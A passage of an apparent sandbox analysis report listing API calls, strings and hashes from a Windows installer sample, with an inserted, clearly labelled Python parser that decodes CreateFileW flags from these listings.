                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0043ED04
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00483E18,?,?,00000000,00000000), ref: 0043EDC0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$ErrorH_prolog3_Last_memset$FreeH_prolog3NameStringTemp$CreateDeleteModulePathlstrcpy
                                                                                                                                                                          • String ID: xLJ$|LJ
                                                                                                                                                                          • API String ID: 1036951016-2420951575
                                                                                                                                                                          • Opcode ID: 7acba02279babadea242a8776319000df87353446d1dc829f67f887ee61a3afc
                                                                                                                                                                          • Instruction ID: b63d76af35cdce9b462fb1661a0711746e3e8756b048c7b80ece83019c61647f
                                                                                                                                                                          • Opcode Fuzzy Hash: 7acba02279babadea242a8776319000df87353446d1dc829f67f887ee61a3afc
                                                                                                                                                                          • Instruction Fuzzy Hash: 07513E71C0111CAADB60EBA1DC85ADE7779AF59304F0001EAF50DA30A1EB785F99CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004405FB
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          • _memset.LIBCMT ref: 00440623
                                                                                                                                                                          • _memset.LIBCMT ref: 00440634
                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 004406BF
                                                                                                                                                                          • PeekMessageW.USER32 ref: 004406F1
                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00440716
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00440723
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000001,000000B8,004214B3,?,00000001), ref: 00440734
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastProcess_memset$CloseCodeCreateExitH_prolog3_HandleMessageMultipleObjectsPeekWait
                                                                                                                                                                          • String ID: Attempting to launch: %s$Launch result %d, exit code %d$utils.cpp
                                                                                                                                                                          • API String ID: 3068613049-2353317557
                                                                                                                                                                          • Opcode ID: e952755842ced4ed8b3adf6eb4d735546a946b3ed5e15eb7774fa6f2e5511f4e
                                                                                                                                                                          • Instruction ID: 7cb4e8b9f22bfe05b51561b9d39bc594a8625d651e35bb7465fc5ecf3ed391ee
                                                                                                                                                                          • Opcode Fuzzy Hash: e952755842ced4ed8b3adf6eb4d735546a946b3ed5e15eb7774fa6f2e5511f4e
                                                                                                                                                                          • Instruction Fuzzy Hash: D7414CB1C00208AEEB10DBE4CD85DEEBBBCEF04349F11416AE606AB291D6745E45CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 0044078D
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 004407D1
                                                                                                                                                                          • PeekMessageW.USER32 ref: 0044083A
                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00440852
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 00440863
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00440874
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CloseCodeExecuteExitHandleMessageMultipleObjectsPeekProcessShellWait_memset
• String ID: <$@
• API String ID: 116963689-1426351568
• Opcode ID: 08be47c9ecb5fca84a94bbea71ca93b9555c964724dcd3555beb553d33e5ce76
• Instruction ID: 916f66e611874592a9ef8bfbfb301ef077d9ce64854e67df2fb9cca157ceb2ee
• Opcode Fuzzy Hash: 08be47c9ecb5fca84a94bbea71ca93b9555c964724dcd3555beb553d33e5ce76
• Instruction Fuzzy Hash: 90311671D00209EFEF10DFE4C988ADEBBB9FB08344F10406AEA05A6250E7799E54DB59
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
  • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
• CreateFileW.KERNEL32(-00000004,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000001,CC858012), ref: 00401A86
• GetLastError.KERNEL32(?,?,00000001,CC858012), ref: 00401A99
• SysFreeString.OLEAUT32(?), ref: 00401AB5
• SysFreeString.OLEAUT32(?), ref: 00401AC0
• SetLastError.KERNEL32(?), ref: 00401AE0
• ReadFile.KERNEL32(00000000,00000000,00000002,00000000,00000000), ref: 00401B18
• WriteFile.KERNEL32(00000000,00000000,00000002,?), ref: 00401B5B
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401B92
• GetLastError.KERNEL32 ref: 00401BB3
• SysFreeString.OLEAUT32(?), ref: 00401BC9
• SysFreeString.OLEAUT32(?), ref: 00401BD4
• SetLastError.KERNEL32(?), ref: 00401BF4
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FileFreeString$Write$CreateRead
• String ID:
• API String ID: 2306213392-0
• Opcode ID: d1ece2afd3369510254341ddc9284f3d1996fb4c1dc89304be5549a346bdd64c
• Instruction ID: 797739fed59da5084f6b06860876438e6c6dd135b8293a77f3c8103bba1d7987
• Opcode Fuzzy Hash: d1ece2afd3369510254341ddc9284f3d1996fb4c1dc89304be5549a346bdd64c
• Instruction Fuzzy Hash: 07512770A00248AFEB10DFA4DC49BADBBB9FF05704F654029E514B72A1DB79A948CF58
Uniqueness

Uniqueness Score: -1.00%
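As an added example (not code from this report, nor from the analysed sample or the sandbox vendor): a small parser for the API reference lines in these function listings that decodes the CreateFileW access and creation-disposition arguments, so that write-capable file opens can be pulled out of a long report mechanically. The line grammar is an assumption inferred from the entries above; the flag values are the documented Win32 constants; the sample lines are copied from this listing and labelled as constructed input.

```python
"""Parse API reference lines from a sandbox function listing and decode the
CreateFileW access/disposition flags they carry.

Added example, not code from the report or from the analysed sample. The line
format is inferred from the listing; the Win32 flag values are the documented
constants.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: lines copied from the function listing above.
SAMPLE = """\
• Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
• CreateFileW.KERNEL32(-00000004,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,00000001,CC858012), ref: 00401A86
• GetLastError.KERNEL32 ref: 00401BB3
• ReadFile.KERNEL32(00000000,00000000,00000002,00000000,00000000), ref: 00401B18
• WriteFile.KERNEL32(00000000,00000000,00000002,?), ref: 00401B5B
• __EH_prolog3_GS.LIBCMT ref: 00419BFF
• Part of subcall function 00419A17: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000,?,00000008,00000000,?,0040D7F7,000000FF,?), ref: 00419A3A
"""

# One bullet per API reference. "Part of subcall function X:" is optional, and
# so is the argument list (e.g. "GetLastError.KERNEL32 ref: 00401BB3").
# The grammar is an assumption based on the lines seen in the report.
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[\w@$?]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 constants: generic access rights and creation dispositions.
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


@dataclass
class ApiRef:
    api: str
    module: str
    args: list[str]
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # enclosing subcall function, if any


def parse_arg(tok: str) -> Optional[int]:
    """Return the 32-bit value of a recorded argument, or None when the sandbox
    recorded '?', a string, or a non-canonical token such as '-00000004'
    (a stack-relative pointer, not a flag value)."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def parse_listing(text: str) -> list[ApiRef]:
    """Turn every API reference line into an ApiRef; other lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as "APIs" / "Strings" do not match
        args = [a for a in (m["args"] or "").split(",") if a != ""]
        refs.append(ApiRef(api=m["api"], module=m["mod"], args=args,
                           ref=int(m["ref"], 16),
                           subcall=int(m["sub"], 16) if m["sub"] else None))
    return refs


def describe_createfile(ref: ApiRef) -> dict:
    """Decode dwDesiredAccess (arg 1) and dwCreationDisposition (arg 4) of a
    CreateFileA/W reference. Only the GENERIC_* bits are named; the full
    value is kept in 'raw_access' so non-generic rights are not lost."""
    if ref.api not in ("CreateFileW", "CreateFileA"):
        raise ValueError(f"not a CreateFile reference: {ref.api}")
    access = parse_arg(ref.args[1]) if len(ref.args) > 1 else None
    disp = parse_arg(ref.args[4]) if len(ref.args) > 4 else None
    names = [n for bit, n in GENERIC_ACCESS.items()
             if access is not None and access & bit]
    return {
        "access": names,
        "raw_access": access,
        "disposition": DISPOSITIONS.get(disp, "unknown"),
        "writes": "GENERIC_WRITE" in names or "GENERIC_ALL" in names,
    }


def write_capable_opens(text: str) -> list[int]:
    """Call-site addresses of CreateFile references that request write access."""
    return [r.ref for r in parse_listing(text)
            if r.api in ("CreateFileW", "CreateFileA")
            and describe_createfile(r)["writes"]]


if __name__ == "__main__":
    for r in parse_listing(SAMPLE):
        if r.api.startswith("CreateFile"):
            print(f"{r.ref:08X} {r.api}.{r.module} {describe_createfile(r)}")
```

Run against the listing above, the CreateFileW at 00401A86 decodes to GENERIC_READ|GENERIC_WRITE with OPEN_ALWAYS, while the one reached through subcall 00419A17 (ref 00419A3A) is a read-only OPEN_EXISTING. The argument values in these lines are stack snapshots taken at the call site: '?' means the sandbox did not resolve the value, and tokens such as -00000004 are stack-relative pointers rather than flags, so only the known flag positions are decoded and everything else is left for the analyst.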

APIs
• __EH_prolog3_GS.LIBCMT ref: 00419BFF
  • Part of subcall function 00419A17: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000,?,00000008,00000000,?,0040D7F7,000000FF,?), ref: 00419A3A
  • Part of subcall function 00419AD9: GetFileSize.KERNEL32(?,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419AF2
  • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000008,00000001,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B13
  • Part of subcall function 00419AD9: HeapAlloc.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B1A
  • Part of subcall function 00419AD9: ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF), ref: 00419B38
  • Part of subcall function 00419AD9: _strlen.LIBCMT ref: 00419B47
  • Part of subcall function 00419AD9: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B7C
  • Part of subcall function 00419AD9: HeapFree.KERNEL32(00000000,?,00000008,00000000,?,?,?,0040D831,000000FF,?,?,000000FF,?), ref: 00419B83
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Heap$File$Process$AllocCreateFreeH_prolog3_ReadSize_strlen
• String ID: $$jG$,jG$@jG$DjG$DjG$HjG$HjG$LjG
• API String ID: 3764712436-4090182768
• Opcode ID: a5594073b342ac47d8d757e19e9cc0c1e979dc4fd6785f5f86a661262f8fa685
• Instruction ID: 6a29706e4c3a97baef7a76b9afd65b7de9abaad9e18291812e22ad97b46dfff5
• Opcode Fuzzy Hash: a5594073b342ac47d8d757e19e9cc0c1e979dc4fd6785f5f86a661262f8fa685
• Instruction Fuzzy Hash: 23F16A70901258EEDB20EFA9CC95BDEBBB8AF05304F5041AEE009B7281DB741E89CF55
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memmove.LIBCMT ref: 00405723
• _memmove.LIBCMT ref: 0040575C
• _memmove.LIBCMT ref: 00405799
• _memmove.LIBCMT ref: 00405996
  • Part of subcall function 00406350: SysAllocStringLen.OLEAUT32(00000000,?), ref: 00406399
  • Part of subcall function 00406350: _memmove.LIBCMT ref: 004063C1
  • Part of subcall function 00406350: SysFreeString.OLEAUT32(00000000), ref: 004063D1
• _memmove.LIBCMT ref: 00405816
• _memmove.LIBCMT ref: 0040589A
• _memmove.LIBCMT ref: 00405917
• _memmove.LIBCMT ref: 0040595A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _memmove$String$AllocFree
• String ID: invalid string position$string too long
• API String ID: 4249169437-4289949731
• Opcode ID: 6ff6ec95346459992305f47ddfd717211c53b66e08d97a7e26ca94ea63ab3ae9
• Instruction ID: 70b84ee266a2cbf4c985e55c222f57e4f033121a581e4cef1a1764262f86ccb9
• Opcode Fuzzy Hash: 6ff6ec95346459992305f47ddfd717211c53b66e08d97a7e26ca94ea63ab3ae9
• Instruction Fuzzy Hash: CED15E71600609DBCB24CF58C9C09ABB7BAFF84344B60452FE845EB291DB34E955CFA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000), ref: 0045D739
• lstrcpyW.KERNEL32 ref: 0045D75A
• lstrlenW.KERNEL32(?,?,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000), ref: 0045D761
• lstrlenW.KERNEL32(?,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4,80000000,00000001,00000080), ref: 0045D785
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: lstrlen$lstrcpy
• String ID: @
• API String ID: 805584807-2766056989
• Opcode ID: efb52d490be84181593167a8a9da440600a26344edb73d9293c253071d747b6e
• Instruction ID: 3de53bd4e4ecc56c741bd26d0c3f7c7757c97541d703d5faaf0591a96d08a574
• Opcode Fuzzy Hash: efb52d490be84181593167a8a9da440600a26344edb73d9293c253071d747b6e
• Instruction Fuzzy Hash: A661D971A00701AFDB24AF35DD45A6BB7E9FF58311F10442FF916CA2A2D7B8E8458B14
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: lstrcpylstrlen$ErrorH_prolog3Lastlstrcatlstrcmpi
• String ID: <$GET
• API String ID: 152113618-427699995
• Opcode ID: 27029d674820e59922f9f4015c14c1226eb06f24b7722a46006542cdbed968b7
• Instruction ID: e52956274272d6e8e42f414706c65881279229233ed1fb1e4674a811ce7c217a
• Opcode Fuzzy Hash: 27029d674820e59922f9f4015c14c1226eb06f24b7722a46006542cdbed968b7
• Instruction Fuzzy Hash: 5B515072900119AFDF119FA0CC49DAF7F76FF08355F04802AFD059A2A2C7798956DB54
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00418173
• DefWindowProcW.USER32(?,?,?,?,0000006C), ref: 004181A3
• GetWindowLongW.USER32(?,000000EB), ref: 004181B9
• BeginPaint.USER32(?,?), ref: 004181C9
• EndPaint.USER32(?,?,?,00000000,00000000,00000000,?), ref: 004181F4
• GetWindowLongW.USER32(?,000000EB), ref: 00418202
• SetWindowLongW.USER32 ref: 00418259
• GetClientRect.USER32 ref: 00418266
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000256), ref: 004182B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Long$Paint$BeginClientH_prolog3_ProcRect
• String ID: GIF
• API String ID: 4259225933-881873598
• Opcode ID: 15da5c69735f9710988cfd94195cc4744daaca479d16584ad1be54889e1725cf
• Instruction ID: 4c19b9c84c2f87fb169aa2a797a20601ff5671a9506507150a35ece1f84cf339
• Opcode Fuzzy Hash: 15da5c69735f9710988cfd94195cc4744daaca479d16584ad1be54889e1725cf
• Instruction Fuzzy Hash: F641AF71800608EFDB11DFA5CD488AEBFB9FF04720B61426EF419A72A1CB348D91DB58
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00454891
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
• GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 004549C7
  • Part of subcall function 00433B38: __EH_prolog3.LIBCMT ref: 00433B3F
  • Part of subcall function 00433B38: GetLastError.KERNEL32(00000004,0043383A,00000008,0043899A,0047C4E4,00000001,?,00000001), ref: 00433B58
• __CxxThrowException@8.LIBCMT ref: 00454916
  • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
• GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000104,00000078,00456C75,?,00000000,00000068,00427852,?,004A4D08,?,00000000,00000000,?), ref: 004548E9
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
• GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000104,00000078,00456C75,?,00000000,00000068,00427852,?,004A4D08,?,00000000,00000000,?), ref: 0045495A
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$Directory$H_prolog3_StringWindows$AllocExceptionException@8H_prolog3RaiseSystemThrow
• String ID: HsG$HsG$HsG$sysnative$syswow64
• API String ID: 415710860-2517776981
• Opcode ID: 2b211a3433428bb4333fac4bd38d443533f84c06f282d2bd9fd9a5dce169fe4e
• Instruction ID: d15ac5da47158ecca3f87f32cae58966e706ce6ee751958ac037911233bd4b12
• Opcode Fuzzy Hash: 2b211a3433428bb4333fac4bd38d443533f84c06f282d2bd9fd9a5dce169fe4e
• Instruction Fuzzy Hash: 4841A070804248DEDB11EBF5C896BDDBBB4BF55308F5080AEE8457B292DB781A4CCB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(CC858012,?,00000001,00000000,?,?,?,?,?,?,?,?,00000000,00471220,000000FF,HsG), ref: 004046C4
• SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00471220,000000FF,HsG), ref: 004046FA
• GetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00471220,000000FF), ref: 00404745
• SysFreeString.OLEAUT32(000000FF), ref: 00404761
• SysFreeString.OLEAUT32(?), ref: 0040476C
• SetLastError.KERNEL32(?), ref: 0040478C
• SetLastError.KERNEL32(00000001), ref: 00404796
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$FreeString
• String ID: HsG$HsG$m<H
• API String ID: 2425351278-2845271504
• Opcode ID: dc6672e3fd9f000d1fa6dec022e1f4b2a9c9f1e538307efbe58478d5671a344b
• Instruction ID: ef2f39e1ee148b39ddc85385380774226a3b5f13eeb7e4b85cc314d68c39e3d0
• Opcode Fuzzy Hash: dc6672e3fd9f000d1fa6dec022e1f4b2a9c9f1e538307efbe58478d5671a344b
• Instruction Fuzzy Hash: 84413871900209EFDB00DFA9D944B9EBBF5FF08308F10412AE919E7751E735A910CB98
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 97dcc12bb1339235cbf6b2114ec48b24f0177d3ebe411fa9adeca378bdffe6ef
• Instruction ID: c69340d1a4b1cb4af706e1d371d997e614cfaae12eb3648ef508158ae4ca9fbe
• Opcode Fuzzy Hash: 97dcc12bb1339235cbf6b2114ec48b24f0177d3ebe411fa9adeca378bdffe6ef
• Instruction Fuzzy Hash: 8A51A2B1540202EFEF245F50D981D92BBF5EF28315F30095BE885DA142E7B9C995CB19
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcmpiW.KERNEL32(?,Delete,?,CC858012,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000), ref: 00432491
• lstrcmpiW.KERNEL32(?,ForceRemove,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000,?,?), ref: 004324A8
• lstrcmpiW.KERNEL32(?,NoRemove,?,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000,?), ref: 00432598
• lstrcmpiW.KERNEL32(?,Val,?,00000000,00000000,?,0046C157,000000FF,?,0043223C,?,00000000,00000000,00000000,?,?), ref: 004325C0
  • Part of subcall function 00431C81: CharNextW.USER32(?,?,00000000,?,?,?,?,0043131F,?,CC858012,?,?,?,?,?,0046C010), ref: 00431CBC
  • Part of subcall function 00431C81: CharNextW.USER32(?,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431D42
  • Part of subcall function 00431C81: CharNextW.USER32(00000000,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431CD9
  • Part of subcall function 00431C81: CharNextW.USER32(00000000,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431CE7
  • Part of subcall function 00431C81: CharNextW.USER32(00000027,00000000,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431D61
• RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,?,?,?), ref: 004326CF
